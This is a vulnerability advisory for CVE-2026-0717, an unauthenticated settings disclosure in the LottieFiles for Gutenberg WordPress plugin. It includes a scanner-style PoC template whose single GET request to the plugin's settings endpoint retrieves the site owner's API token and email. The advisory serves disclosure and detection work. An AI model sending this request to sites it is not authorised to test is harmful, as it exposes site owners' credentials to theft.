CVE-2026-0717: LottieFiles for Gutenberg <= 3.0.0 - Unauthenticated Settings Disclosure

2026-08-25 LottieFiles for Gutenberg PoC Public

Description

The LottieFiles – Lottie block for Gutenberg plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.0 via the `/wp-json/lottiefiles/v1/settings/` REST API endpoint. This makes it possible for unauthenticated attackers to retrieve the site owner's LottieFiles.com account credentials including their API access token and email address when the 'Share LottieFiles account with other WordPress users' option is enabled.

PoC

id: CVE-2026-0717

info:
  name: LottieFiles for Gutenberg <= 3.0.0 - Unauthenticated Settings Disclosure
  author: str4k3r
  severity: medium
  description: |
    The LottieFiles – Lottie block for Gutenberg plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.0 via the `/wp-json/lottiefiles/v1/settings/` REST API endpoint. This makes it possible for unauthenticated attackers to retrieve the site owner's LottieFiles.com account credentials including their API access token and email address when the 'Share LottieFiles account with other WordPress users' option is enabled.
  impact: |
    Unauthenticated attackers can retrieve API tokens and email addresses, compromising account security and privacy.
  remediation: |
    Update to the latest version beyond 3.0.0.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/19b159ca-4b41-48b4-880d-9b9dc44b3463?source=cve
    - https://plugins.trac.wordpress.org/browser/lottiefiles/tags/3.0.0/src/common.php?marks=21,122#L21
    - https://plugins.trac.wordpress.org/changeset/3442469/
  classification:
    cve-id: CVE-2026-0717
    epss-score: 0.00699
    epss-percentile: 0.51438
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,wordpress,lottiefiles,gutenberg,exposure,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/lottiefiles/v1/settings/"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "is_block_logged_in"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210089d2b16aff2db99536424bc02f640c8aacb923d606249f02b3b96e464819444f02207c2dfef6672c6c7601b8de2bc96ed2a9da26a76aa61fc4df3dee6654e4db9ce1:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities